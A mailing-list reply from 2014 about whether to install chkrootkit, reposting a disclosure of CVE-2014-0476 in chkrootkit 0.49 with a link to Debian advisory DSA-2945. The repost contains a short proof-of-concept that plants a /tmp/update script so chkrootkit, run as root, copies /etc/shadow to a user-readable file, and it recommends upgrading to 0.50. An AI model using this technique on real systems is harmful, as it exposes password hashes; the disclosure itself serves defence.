Re: Should I install chkrootkit?

[<hohe72@arcor.de>]

Guess that is the matter:
https://www.debian.org/security/2014/dsa-2945
--hh

Just reposting:


Date: Thu, 05 Jun 2014 06:27:35 +0000
From: "mancha" <mancha1@hush.com>
To: slackbuilds-users@slackbuilds.org
Subject: [Slackbuilds-users] chkrootkit vulnerability


Hi.

As ironic as it sounds, chkrootkit 0.49 can be turned into a 
rootkit.

On systems where /tmp is not mounted noexec, a regular user can 
create a file /tmp/update which chkrootkit will execute with root
privileges each time it's run.

Here's a simple PoC...as normal user: 

$ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update
$ chmod 755 /tmp/update

As root:

# chkrootkit

Now the user has access to the shadow password file (/tmp/stolen).

Solution: Update to chkrootkit 0.50

--mancha

-----------------
PGP: 0x25168EB24F0B22AC
[56B7 100E F4D5 811C 8FEF  ADD1 2516 8EB2 4F0B 22AC]




Horatio Leragon <hleragon@yahoo.com> wrote (Wed, 4 Jun 2014 04:38:45
-0700 (PDT)):
> I received a security update advisory [SECURITY] [DSA 2945-1] today.
> 
> Package        : chkrootkit
> CVE ID         : CVE-2014-0476
> 
> I am shocked to learn that Debian is vulnerable to rootkits. That's
> why there's a package to check for them.
> 
> I switched to Debian from Microsoft Windows OS because of the massive
> over-hype that I read on the internet: that Debian is impervious to
> malware and no viruses have ever infected a *nix OS.
> 
> 
> Should I install this package called "chkrootkit"?
> 
> But then it itself is vulnerable to errors in its code :(